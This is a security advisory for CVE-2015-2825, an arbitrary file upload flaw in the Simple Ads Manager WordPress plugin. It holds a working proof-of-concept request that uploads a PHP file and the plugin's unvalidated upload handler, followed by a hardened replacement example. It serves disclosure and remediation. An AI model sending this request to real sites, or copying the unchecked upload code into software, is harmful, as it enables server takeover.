Vendor: Simple Ads Manager
By: Tran Dinh Tien & ITAS Team
CVSS: 8.8 (HIGH)
Type: Arbitrary File Upload
CWE: 434
Product Name: Simple Ads Manager
Affected Version From: Simple Ads Manager 2.5.94
Affected Version To: Simple Ads Manager 2.5.94
Patch Exists: YES
Related CVE: CVE-2015-2825
CPE: a:wordpress:simple_ads_manager
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2015

WordPress plugin Simple Ads Manager – Arbitrary File Upload

A vulnerability in the WordPress plugin Simple Ads Manager allows an attacker to upload arbitrary files to the server. The upload handler in 'sam-ajax-admin.php' (lines 303 to 314) does not validate the uploaded file: it takes the destination directory from the 'path' POST parameter, appends the client-supplied file name, and moves the file there with no check on its type or extension. An attacker can use this to upload malicious files and execute arbitrary code on the server.

Mitigation:

Update the plugin to the latest version

Exploit-DB raw data:

#Vulnerability title: WordPress plugin Simple Ads Manager - Arbitrary File Upload
#Product: WordPress plugin Simple Ads Manager
#Vendor: https://profiles.wordpress.org/minimus/
#Affected version: Simple Ads Manager 2.5.94
#Download link: https://wordpress.org/plugins/simple-ads-manager/
#CVE ID: CVE-2015-2825
#Author: Tran Dinh Tien (tien.d.tran@itas.vn) & ITAS Team


::PROOF OF CONCEPT::

+ REQUEST
POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1
Host: targer.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Content-Type: multipart/form-data; boundary=---------------------------108989518220095255551617421026
Content-Length: 683

-----------------------------108989518220095255551617421026
Content-Disposition: form-data; name="uploadfile"; filename="info.php"
Content-Type: application/x-php

<?php phpinfo(); ?>
-----------------------------108989518220095255551617421026
Content-Disposition: form-data; name="action"

upload_ad_image
-----------------------------108989518220095255551617421026--


+ Vulnerable file: simple-ads-manager/sam-ajax-admin.php

+ Vulnerable code: from line 303 to 314

    case 'sam_ajax_upload_ad_image':
      if(isset($_POST['path'])) {
        $uploadDir = $_POST['path'];
        $file = $uploadDir . basename($_FILES['uploadfile']['name']);

        if ( move_uploaded_file( $_FILES['uploadfile']['tmp_name'], $file )) {
          $out = array('status' => "success");
        } else {
          $out = array('status' => "error");
        }
      }
      break;
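
A hardened form of the handler above, as an added example that is not the plugin's own code or its actual patch: the destination directory is fixed server-side, the extension is checked against an allow-list, and the stored name is generated by the server. SAM_UPLOAD_DIR, SAM_ALLOWED and sam_safe_upload() are hypothetical names, and the image-only allow-list is an assumption.

```php
<?php
// Added example, not the plugin's code. SAM_UPLOAD_DIR, SAM_ALLOWED and
// sam_safe_upload() are hypothetical; the image allow-list is an assumption.
define('SAM_UPLOAD_DIR', __DIR__ . '/ad-images');  // fixed, server-chosen
const SAM_ALLOWED = [                               // extension => expected MIME
    'jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg',
    'png' => 'image/png',  'gif'  => 'image/gif',
];

// Validate one $_FILES entry and store it in $dir. Returns the stored
// file name; throws RuntimeException when the upload is rejected.
function sam_safe_upload(array $file, string $dir): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    // 1. Extension must be on the allow-list (so .php never qualifies).
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!array_key_exists($ext, SAM_ALLOWED)) {
        throw new RuntimeException('extension not allowed');
    }
    // 2. Server-side content sniffing must agree with the extension; the
    //    client-sent Content-Type ($file['type']) is not trusted.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime !== SAM_ALLOWED[$ext]) {
        throw new RuntimeException('content does not match extension');
    }
    // 3. Server-generated name: nothing client-controlled reaches the path.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], $dir . '/' . $name)) {
        throw new RuntimeException('could not store file');
    }
    return $name;
}

// Body for the 'sam_ajax_upload_ad_image' case: $_POST['path'] is never read.
try {
    $stored = sam_safe_upload($_FILES['uploadfile'] ?? [], SAM_UPLOAD_DIR);
    $out = array('status' => 'success', 'file' => $stored);
} catch (RuntimeException $e) {
    $out = array('status' => 'error');  // no internal detail to the client
}
```

As a second layer, the web server can be configured not to execute scripts from the upload directory.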
	  
	  
+ REFERENCE: 
- http://www.itas.vn/news/ITAS-Team-found-out-multiple-critical-vulnerabilities-in-Hakin9-IT-Security-Magazine-78.html?language=en
- https://www.youtube.com/watch?v=8IU9EtUTkxI